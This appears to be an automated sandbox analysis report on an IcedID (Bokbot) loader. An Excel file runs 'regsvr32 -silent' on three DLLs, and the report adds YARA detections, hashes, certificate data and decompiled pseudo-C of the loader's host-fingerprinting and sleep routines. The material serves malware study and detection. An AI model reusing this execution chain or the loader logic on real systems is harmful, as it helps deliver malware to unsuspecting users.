                                                                                                                                                                                                                Jul 6, 2021 15:17:38.521248102 CEST13.224.92.73443192.168.2.2249174CN=aws.amazon.com CN=Amazon, OU=Server CA 1B, O=Amazon, C=US CN=Amazon Root CA 1, O=Amazon, C=US CN=Starfield Services Root Certificate Authority - G2, O="Starfield Technologies, Inc.", L=Scottsdale, ST=Arizona, C=USCN=Amazon, OU=Server CA 1B, O=Amazon, C=US CN=Amazon Root CA 1, O=Amazon, C=US CN=Starfield Services Root Certificate Authority - G2, O="Starfield Technologies, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Starfield Class 2 Certification Authority, O="Starfield Technologies, Inc.", C=USWed Sep 30 02:00:00 CEST 2020 Thu Oct 22 02:00:00 CEST 2015 Mon May 25 14:00:00 CEST 2015 Wed Sep 02 02:00:00 CEST 2009Thu Sep 23 14:00:00 CEST 2021 Sun Oct 19 02:00:00 CEST 2025 Thu Dec 31 02:00:00 CET 2037 Wed Jun 28 19:39:16 CEST 2034769,49172-49171-57-51-53-47-49162-49161-56-50-10-19-5-4,0-10-11-23-65281,23-24,005af1f5ca1b87cc9cc9b25185115607d
                                                                                                                                                                                                                CN=Amazon, OU=Server CA 1B, O=Amazon, C=USCN=Amazon Root CA 1, O=Amazon, C=USThu Oct 22 02:00:00 CEST 2015Sun Oct 19 02:00:00 CEST 2025
                                                                                                                                                                                                                CN=Amazon Root CA 1, O=Amazon, C=USCN=Starfield Services Root Certificate Authority - G2, O="Starfield Technologies, Inc.", L=Scottsdale, ST=Arizona, C=USMon May 25 14:00:00 CEST 2015Thu Dec 31 02:00:00 CET 2037
                                                                                                                                                                                                                CN=Starfield Services Root Certificate Authority - G2, O="Starfield Technologies, Inc.", L=Scottsdale, ST=Arizona, C=USOU=Starfield Class 2 Certification Authority, O="Starfield Technologies, Inc.", C=USWed Sep 02 02:00:00 CEST 2009Wed Jun 28 19:39:16 CEST 2034

                                                                                                                                                                                                                Code Manipulations

                                                                                                                                                                                                                Statistics

                                                                                                                                                                                                                CPU Usage

                                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                                Memory Usage

                                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                                High Level Behavior Distribution

                                                                                                                                                                                                                Click to dive into process behavior distribution

                                                                                                                                                                                                                Behavior

                                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                                System Behavior

                                                                                                                                                                                                                Analysis Process: EXCEL.EXE PID: 2632 Parent PID: 584

                                                                                                                                                                                                                General

                                                                                                                                                                                                                Start time:15:17:47
                                                                                                                                                                                                                Start date:06/07/2021
                                                                                                                                                                                                                Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                                                                                                                                                                                                                Imagebase:0x13f9f0000
                                                                                                                                                                                                                File size:27641504 bytes
                                                                                                                                                                                                                MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                Reputation:high

                                                                                                                                                                                                                Chronological Activities

                                                                                                                                                                                                                Analysis Process: regsvr32.exe PID: 2408 Parent PID: 2632

                                                                                                                                                                                                                General

                                                                                                                                                                                                                Start time:15:17:49
                                                                                                                                                                                                                Start date:06/07/2021
                                                                                                                                                                                                                Path:C:\Windows\System32\regsvr32.exe
                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                Commandline:regsvr32 -silent ..\XRAY.dll
                                                                                                                                                                                                                Imagebase:0xff7c0000
                                                                                                                                                                                                                File size:19456 bytes
                                                                                                                                                                                                                MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                • Rule: JoeSecurity_IcedID_1, Description: Yara detected IcedID, Source: 00000003.00000002.2112709350.00000000001CE000.00000004.00000020.sdmp, Author: Joe Security
                                                                                                                                                                                                                • Rule: MAL_IcedID_GZIP_LDR_202104, Description: 2021 initial Bokbot / Icedid loader for fake GZIP payloads, Source: 00000003.00000002.2112661766.0000000000130000.00000004.00000001.sdmp, Author: Thomas Barabosch, Telekom Security
                                                                                                                                                                                                                • Rule: JoeSecurity_IcedID_1, Description: Yara detected IcedID, Source: 00000003.00000002.2112727320.00000000001F7000.00000004.00000020.sdmp, Author: Joe Security
                                                                                                                                                                                                                Reputation:high

                                                                                                                                                                                                                Chronological Activities

                                                                                                                                                                                                                Analysis Process: regsvr32.exe PID: 3068 Parent PID: 2632

                                                                                                                                                                                                                General

                                                                                                                                                                                                                Start time:15:17:53
                                                                                                                                                                                                                Start date:06/07/2021
                                                                                                                                                                                                                Path:C:\Windows\System32\regsvr32.exe
                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                Commandline:regsvr32 -silent ..\XTOWN.dll
                                                                                                                                                                                                                Imagebase:0xff7c0000
                                                                                                                                                                                                                File size:19456 bytes
                                                                                                                                                                                                                MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                • Rule: MAL_IcedID_GZIP_LDR_202104, Description: 2021 initial Bokbot / Icedid loader for fake GZIP payloads, Source: 00000004.00000002.2122390386.00000000001A0000.00000004.00000001.sdmp, Author: Thomas Barabosch, Telekom Security
                                                                                                                                                                                                                • Rule: JoeSecurity_IcedID_1, Description: Yara detected IcedID, Source: 00000004.00000002.2122456225.0000000000303000.00000004.00000020.sdmp, Author: Joe Security
                                                                                                                                                                                                                Reputation:high

                                                                                                                                                                                                                Chronological Activities

                                                                                                                                                                                                                Analysis Process: regsvr32.exe PID: 2296 Parent PID: 2632

                                                                                                                                                                                                                General

                                                                                                                                                                                                                Start time:15:17:57
                                                                                                                                                                                                                Start date:06/07/2021
                                                                                                                                                                                                                Path:C:\Windows\System32\regsvr32.exe
                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                Commandline:regsvr32 -silent ..\XZIBIT.dll
                                                                                                                                                                                                                Imagebase:0xff7c0000
                                                                                                                                                                                                                File size:19456 bytes
                                                                                                                                                                                                                MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                • Rule: MAL_IcedID_GZIP_LDR_202104, Description: 2021 initial Bokbot / Icedid loader for fake GZIP payloads, Source: 00000005.00000002.2129614420.0000000000190000.00000004.00000001.sdmp, Author: Thomas Barabosch, Telekom Security
                                                                                                                                                                                                                • Rule: JoeSecurity_IcedID_1, Description: Yara detected IcedID, Source: 00000005.00000002.2129743250.000000000037D000.00000004.00000020.sdmp, Author: Joe Security
                                                                                                                                                                                                                Reputation:high

                                                                                                                                                                                                                Chronological Activities

                                                                                                                                                                                                                Disassembly

                                                                                                                                                                                                                Code Analysis

                                                                                                                                                                                                                Reset < >

                                                                                                                                                                                                                  Analysis Process: regsvr32.exe PID: 2408 Parent PID: 2632 regsvr32.exeCOMMON

                                                                                                                                                                                                                  Executed Functions

                                                                                                                                                                                                                  Function 002C27BC, Relevance: 3.1, APIs: 2, Instructions: 87COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  C-Code - Quality: 25%
                                                                                                                                                                                                                  			E002C27BC(long long __rbx, void* __rcx, signed long long __rsi, long long __rbp, void* _a8, void* _a16, void* _a24, void* _a32) {
				void* __rdi;
				int _t23;
				void* _t24;
				void* _t27;
				intOrPtr _t35;
				void* _t36;
				intOrPtr* _t44;
				long long _t46;
				intOrPtr* _t48;
				intOrPtr* _t54;
				intOrPtr* _t62;
				signed long long _t64;
				long long* _t67;
				intOrPtr* _t69;
				void* _t77;
				void* _t78;
				struct HINSTANCE__* _t79;
				void* _t80;
				CHAR* _t82;
				char* _t83;

				_t64 = __rsi;
				_t46 = __rbx;
				_t44 = _t69;
				 *((long long*)(_t44 + 8)) = __rbx;
				 *((long long*)(_t44 + 0x18)) = __rbp;
				 *((long long*)(_t44 + 0x20)) = __rsi;
				_push(_t62);
				_t80 = __rcx;
				_t83 = L"; _gid=";
				 *(_t44 + 0x10) =  *(_t44 + 0x10) & 0;
				LoadLibraryA(_t82);
				GetProcAddress(_t79);
				_t67 = _t44;
				if(_t44 == 0) {
					L6:
					r9d = 1;
					_t23 = E002C2990(_t36, _t44, _t46, _t80, L"; _gid=", _t62, 0x2c70c4, _t77, _t78);
					L7:
					return _t23;
				}
				_t24 =  *_t67(); // executed
				if(_t24 == 0x6f && __rbx != 0) {
					GetProcessHeap();
					_t9 = _t64 + 8; // 0x8
					_t36 = _t9;
					HeapAlloc(??, ??, ??);
					_t62 = _t44;
					if(_t44 == 0) {
						goto L6;
					}
					_t54 = _t44; // executed
					_t27 =  *_t67(); // executed
					if(_t27 == 0) {
						_t48 = _t62;
						do {
							if( *((char*)(_t48 + 0x1c0)) != 0x30 ||  *((char*)(_t48 + 0x1c1)) != 0x2e) {
								_t35 =  *((intOrPtr*)(_t48 + 0x194));
								if(_t54 - 1 <= 7) {
									r9d = _t35;
									_t18 = _t48 + 0x198; // 0x198
									_t54 = _t80 + _t64 * 2;
									E002C2990(_t36, _t44, _t48, _t54, _t83, _t62, _t18, _t77, _t78);
									_t64 = _t64 + _t44;
									_t83 = ":";
								}
							}
							_t48 =  *_t48;
						} while (_t48 != 0);
						GetProcessHeap();
						_t36 = 0;
						_t23 = HeapFree(??, ??, ??);
						if(_t64 == 0) {
							goto L6;
						}
						goto L7;
					}
					GetProcessHeap();
					_t36 = 0;
					HeapFree(??, ??, ??);
				}
			}























                                                                                                                                                                                                                  0x002c27bc
                                                                                                                                                                                                                  0x002c27bc
                                                                                                                                                                                                                  0x002c27bc
                                                                                                                                                                                                                  0x002c27bf
                                                                                                                                                                                                                  0x002c27c3
                                                                                                                                                                                                                  0x002c27c7
                                                                                                                                                                                                                  0x002c27cb
                                                                                                                                                                                                                  0x002c27d4
                                                                                                                                                                                                                  0x002c27d7
                                                                                                                                                                                                                  0x002c27e7
                                                                                                                                                                                                                  0x002c27ea
                                                                                                                                                                                                                  0x002c27fa
                                                                                                                                                                                                                  0x002c2800
                                                                                                                                                                                                                  0x002c2806
                                                                                                                                                                                                                  0x002c285f
                                                                                                                                                                                                                  0x002c285f
                                                                                                                                                                                                                  0x002c2876
                                                                                                                                                                                                                  0x002c287b
                                                                                                                                                                                                                  0x002c2893
                                                                                                                                                                                                                  0x002c2893
                                                                                                                                                                                                                  0x002c280f
                                                                                                                                                                                                                  0x002c2814
                                                                                                                                                                                                                  0x002c281f
                                                                                                                                                                                                                  0x002c282c
                                                                                                                                                                                                                  0x002c282c
                                                                                                                                                                                                                  0x002c282f
                                                                                                                                                                                                                  0x002c2835
                                                                                                                                                                                                                  0x002c283b
                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                  0x002c2842
                                                                                                                                                                                                                  0x002c2845
                                                                                                                                                                                                                  0x002c2849
                                                                                                                                                                                                                  0x002c2894
                                                                                                                                                                                                                  0x002c2897
                                                                                                                                                                                                                  0x002c289e
                                                                                                                                                                                                                  0x002c28a9
                                                                                                                                                                                                                  0x002c28b5
                                                                                                                                                                                                                  0x002c28b7
                                                                                                                                                                                                                  0x002c28ba
                                                                                                                                                                                                                  0x002c28c1
                                                                                                                                                                                                                  0x002c28c8
                                                                                                                                                                                                                  0x002c28cd
                                                                                                                                                                                                                  0x002c28d0
                                                                                                                                                                                                                  0x002c28d0
                                                                                                                                                                                                                  0x002c28b5
                                                                                                                                                                                                                  0x002c28d7
                                                                                                                                                                                                                  0x002c28da
                                                                                                                                                                                                                  0x002c28df
                                                                                                                                                                                                                  0x002c28e8
                                                                                                                                                                                                                  0x002c28ed
                                                                                                                                                                                                                  0x002c28f6
                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                  0x002c28fc
                                                                                                                                                                                                                  0x002c284b
                                                                                                                                                                                                                  0x002c2854
                                                                                                                                                                                                                  0x002c2859
                                                                                                                                                                                                                  0x002c2859

                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • GetAdaptersInfo.IPHLPAPI(?,?,00000000,002C2CFE,?,?,00000003,002C24A4), ref: 002C280F
                                                                                                                                                                                                                  • GetAdaptersInfo.IPHLPAPI(?,?,00000000,002C2CFE,?,?,00000003,002C24A4), ref: 002C2845
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000003.00000002.2112815067.00000000002C0000.00000040.00000001.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: AdaptersInfo
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 3177971545-0
                                                                                                                                                                                                                  • Opcode ID: fc699fa13e68b788d874d6a78f58e359039745370b383d3aa825a9febfb906a8
                                                                                                                                                                                                                  • Instruction ID: 32b37530536a89ab68e8b4f086ee650c9afca4d56aa612e1f3d401c71c44453b
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fc699fa13e68b788d874d6a78f58e359039745370b383d3aa825a9febfb906a8
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 17316962615B81D2FB19EF62E818B9E7761FB49F94F484229CE0D07718EE38C58EC750
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 002C1678, Relevance: 3.1, APIs: 2, Instructions: 77memorynativeCOMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • NtQuerySystemInformation.NTDLL(?,?,00000000,002C2CB1,?,?,00000003,002C24A4), ref: 002C16CB
                                                                                                                                                                                                                  • RtlAllocateHeap.NTDLL(?,?,00000000,002C2CB1,?,?,00000003,002C24A4), ref: 002C1709
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000003.00000002.2112815067.00000000002C0000.00000040.00000001.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: AllocateHeapInformationQuerySystem
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 3114120137-0
                                                                                                                                                                                                                  • Opcode ID: 15ab51baa947bc1f3c3fdf1eb6848148db47552542206cc3bcd8ce7c2f187386
                                                                                                                                                                                                                  • Instruction ID: 8f129e81b374d7be9979a2f846a462daf7985c7c8154cfcb6235ac25fd41519a
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 15ab51baa947bc1f3c3fdf1eb6848148db47552542206cc3bcd8ce7c2f187386
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A821B221365B4183FF09DF52A819B6AA2A1FF86BC0F184138DE0E43715EF3CC9698740
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 002C1810, Relevance: 1.7, APIs: 1, Instructions: 198memoryCOMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000003.00000002.2112815067.00000000002C0000.00000040.00000001.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: AllocateHeap
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 1279760036-0
                                                                                                                                                                                                                  • Opcode ID: c3a72f5bfcfd91918b5e83c3bb15c180b6cc2b39742bdcf2d413e26ac2e8c0cf
                                                                                                                                                                                                                  • Instruction ID: c1ae530888e08781f56dd60af52fc637296969fcbbb79557002f7de13d945248
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c3a72f5bfcfd91918b5e83c3bb15c180b6cc2b39742bdcf2d413e26ac2e8c0cf
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5771A132311B828BEB24CF66E855F9E37A1FB49B94F488219DE4A43B14DF78C565C700
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 002C22DC, Relevance: 1.6, APIs: 1, Instructions: 93COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • LookupAccountNameW.ADVAPI32 ref: 002C233C
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000003.00000002.2112815067.00000000002C0000.00000040.00000001.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: AccountLookupName
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 1484870144-0
                                                                                                                                                                                                                  • Opcode ID: cafe0df7641921cb4b3b83197fca258bc474e661d5f4a52d45703bbf776aa30b
                                                                                                                                                                                                                  • Instruction ID: 9188131859a2e715a93b51a2e648a766612e2f17c95647c2b92adce4ffaf7403
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cafe0df7641921cb4b3b83197fca258bc474e661d5f4a52d45703bbf776aa30b
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EE315D72711B818AEB289FB5E854B9E33A4FB48788F584139DA4D57A18EF38C559C340
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 002C2434, Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  C-Code - Quality: 58%
                                                                                                                                                                                                                  			E002C2434(void* __eax, signed long long __rax, signed long long __rbx, signed int __rcx, signed long long __rdx, long long __rdi, void* __rsi, void* __r9, void* __r11, void* __r14) {
				void* __rbp;
				void* _t27;
				void* _t40;
				void* _t41;
				signed long long _t51;
				signed long long _t52;
				signed long long _t64;
				long long _t69;
				void* _t73;
				void* _t75;
				void* _t82;

				_t82 = __r9;
				_t71 = __rsi;
				_t69 = __rdi;
				_t64 = __rdx;
				_t52 = __rbx;
				_t51 = __rax;
				 *((long long*)(_t75 + 0x18)) = __rbx;
				 *((long long*)(_t75 + 0x20)) = __rdi;
				_t73 = _t75 - 0x57;
				_t4 = _t52 + 4; // 0x4
				_t40 = _t4;
				goto L1;
				L9:
				return 0;
				L1:
				asm("rdtsc");
				_t64 = _t64 << 0x20;
				_t51 = _t51 | _t64;
				_t52 = _t52 << 0x00000010 | __rcx;
				SleepEx(??, ??); // executed
				_t69 = _t69 - 1;
				if(_t69 != 0) {
					goto L1;
				} else {
					wsprintfA();
					E002C11FC(_t73 - 0x29, _t52);
					_t37 = E002C153C(_t73 - 0x29);
					E002C2C08( *((intOrPtr*)(_t73 + 0x17)), _t23, _t40, _t51, _t52, __rsi, _t73, _t73 - 0x49, _t82);
					_t44 = _t51;
					if(_t51 != 0) {
						_t80 = _t73 + 0x67;
						if(E002C1EEC(_t37, _t44, _t51, _t52, _t73 + 0x1b, _t51, _t71, _t73, _t73 + 0x67, _t73 + 0x6f, __r11, __r14) != 0) {
							_t67 =  *((intOrPtr*)(_t73 + 0x6f));
							if( *((intOrPtr*)(_t73 + 0x6f)) >= 0x400) {
								_t27 = E002C272C(0, _t37, _t40,  *((intOrPtr*)(_t73 + 0x67)), _t67, _t69, _t73, _t80, __r11, __r14);
								_t55 =  *((intOrPtr*)(_t73 + 0x67));
								_t41 = _t27;
								if( *((intOrPtr*)(_t73 + 0x67)) != 0) {
									GetProcessHeap();
									HeapFree(??, ??, ??);
								}
								E002C1FD0(_t41, _t51, _t55, _t73 - 0x49, _t71);
								_t49 = _t51;
								if(_t51 != 0) {
									E002C2A1C(_t49, _t73 + 0x1b, _t51);
								}
							}
						}
					}
					goto L9;
				}
			}














                                                                                                                                                                                                                  0x002c2434
                                                                                                                                                                                                                  0x002c2434
                                                                                                                                                                                                                  0x002c2434
                                                                                                                                                                                                                  0x002c2434
                                                                                                                                                                                                                  0x002c2434
                                                                                                                                                                                                                  0x002c2434
                                                                                                                                                                                                                  0x002c2434
                                                                                                                                                                                                                  0x002c2439
                                                                                                                                                                                                                  0x002c243f
                                                                                                                                                                                                                  0x002c244d
                                                                                                                                                                                                                  0x002c244d
                                                                                                                                                                                                                  0x002c244d
                                                                                                                                                                                                                  0x002c2512
                                                                                                                                                                                                                  0x002c2528
                                                                                                                                                                                                                  0x002c2450
                                                                                                                                                                                                                  0x002c2454
                                                                                                                                                                                                                  0x002c2456
                                                                                                                                                                                                                  0x002c245a
                                                                                                                                                                                                                  0x002c2460
                                                                                                                                                                                                                  0x002c2468
                                                                                                                                                                                                                  0x002c246e
                                                                                                                                                                                                                  0x002c2472
                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                  0x002c2474
                                                                                                                                                                                                                  0x002c2482
                                                                                                                                                                                                                  0x002c248c
                                                                                                                                                                                                                  0x002c249d
                                                                                                                                                                                                                  0x002c249f
                                                                                                                                                                                                                  0x002c24a4
                                                                                                                                                                                                                  0x002c24a7
                                                                                                                                                                                                                  0x002c24b0
                                                                                                                                                                                                                  0x002c24bf
                                                                                                                                                                                                                  0x002c24c1
                                                                                                                                                                                                                  0x002c24cc
                                                                                                                                                                                                                  0x002c24d2
                                                                                                                                                                                                                  0x002c24d7
                                                                                                                                                                                                                  0x002c24db
                                                                                                                                                                                                                  0x002c24e0
                                                                                                                                                                                                                  0x002c24e2
                                                                                                                                                                                                                  0x002c24f0
                                                                                                                                                                                                                  0x002c24f0
                                                                                                                                                                                                                  0x002c24fc
                                                                                                                                                                                                                  0x002c2501
                                                                                                                                                                                                                  0x002c2504
                                                                                                                                                                                                                  0x002c250d
                                                                                                                                                                                                                  0x002c250d
                                                                                                                                                                                                                  0x002c2504
                                                                                                                                                                                                                  0x002c24cc
                                                                                                                                                                                                                  0x002c24bf
                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                  0x002c24a7

                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000003.00000002.2112815067.00000000002C0000.00000040.00000001.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: Sleep
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 3472027048-0
                                                                                                                                                                                                                  • Opcode ID: 20254b6f6f1ff962b78622cb32e4c72357f2ae928b9d5189ffb1cb94102db212
                                                                                                                                                                                                                  • Instruction ID: e36786dcc4853b4f043ff3306e70a8f7be3343b1d0f52fefb02dff832682a629
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 20254b6f6f1ff962b78622cb32e4c72357f2ae928b9d5189ffb1cb94102db212
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4B21B332310A41DAEF14EFB1D855BDE3361FB44784F88462ADE4D57609EE38D529C750
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 000007FEF8FB1370, Relevance: 16.6, APIs: 1, Strings: 10, Instructions: 107memoryCOMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000003.00000002.2118414088.000007FEF8FB1000.00000020.00020000.sdmp, Offset: 000007FEF8FB0000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000003.00000002.2118409087.000007FEF8FB0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                  • Associated: 00000003.00000002.2118420512.000007FEF8FB5000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                  • Associated: 00000003.00000002.2118435118.000007FEF8FBE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                  • Associated: 00000003.00000002.2118440758.000007FEF8FC0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                                                                                                  • String ID: 2$7$EiFgBnIoIsIqIrIsJhJeJfJg;o;nJjJk?dJmJnJoJpJqJrJs?d;e;f;g;h;i;j;k;l;m;n;o;p;q;r;s<d<e<f<g<h<i<j<k<l<m<n<o<p<q<r<s=d=e=f=gGh=i=j=k=j>jDd=i=pDm=kIf<eCm>gBsJm<hAf@s@e?n<n?o?r@f@m?q=e=pAf=d=i=o=l=l>pAm=l=rAp>s>o=eBd>l>pBg<d<n;iBk>i>j>r>rBf@d@g@i?hAeAfAgAhAiAjAk?qEl$G$G$G$G$G$G$G
                                                                                                                                                                                                                  • API String ID: 4275171209-1517691801
                                                                                                                                                                                                                  • Opcode ID: 9f30d811a221398f518b31910462adcca0b5cd8e48923cbb55d48ba8a3c95936
                                                                                                                                                                                                                  • Instruction ID: ca2938b5bc2ab7f46aca023ee6394d65c54054d49ca74a4c487f6248e662f014
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9f30d811a221398f518b31910462adcca0b5cd8e48923cbb55d48ba8a3c95936
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0451E0B251D6C5CAE3A18B28B49479BBFA0F386358F105128E6CD4BBA9C37DC518CF44
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 000007FEF8FB11B0, Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 66threadsynchronizationCOMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000003.00000002.2118414088.000007FEF8FB1000.00000020.00020000.sdmp, Offset: 000007FEF8FB0000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000003.00000002.2118409087.000007FEF8FB0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                  • Associated: 00000003.00000002.2118420512.000007FEF8FB5000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                  • Associated: 00000003.00000002.2118435118.000007FEF8FBE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                  • Associated: 00000003.00000002.2118440758.000007FEF8FC0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: Thread$CreateCurrentDuplicateHandleObjectPriorityResumeSingleWait
                                                                                                                                                                                                                  • String ID: DllRegisterServer$G$_
                                                                                                                                                                                                                  • API String ID: 1174013218-1650116920
                                                                                                                                                                                                                  • Opcode ID: fb96d5351e15185721c7c678f22100d1a9f993aebe460c17edc53ec82f678213
                                                                                                                                                                                                                  • Instruction ID: 3f6dfe96583287e2132e89248d3fe6d141595118fd8055dab05f5fe12df3ddc3
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fb96d5351e15185721c7c678f22100d1a9f993aebe460c17edc53ec82f678213
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 30310772908B868AE7A4CF25F84435AB7E1F7893A4F504039E68C97B78DB3DD1448F40
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 000007FEF8FB20A0, Relevance: 3.4, APIs: 1, Strings: 1, Instructions: 406memoryCOMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000003.00000002.2118414088.000007FEF8FB1000.00000020.00020000.sdmp, Offset: 000007FEF8FB0000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000003.00000002.2118409087.000007FEF8FB0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                  • Associated: 00000003.00000002.2118420512.000007FEF8FB5000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                  • Associated: 00000003.00000002.2118435118.000007FEF8FBE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                  • Associated: 00000003.00000002.2118440758.000007FEF8FC0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                                                                                                  • String ID: @
                                                                                                                                                                                                                  • API String ID: 4275171209-2766056989
                                                                                                                                                                                                                  • Opcode ID: 81cc5fa61e63df9641c82d5ec4088076d96df196aa3fedfd4a34d15b22035c1b
                                                                                                                                                                                                                  • Instruction ID: 93e7fb77665375a9f577d392b660a0ccbaf77ebf490505a570474afec7383057
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 81cc5fa61e63df9641c82d5ec4088076d96df196aa3fedfd4a34d15b22035c1b
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 62326C76609BC58AD7B5CB56F49079AB7A5F789B90F10802AEACC93B18DB3CC154CF01
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

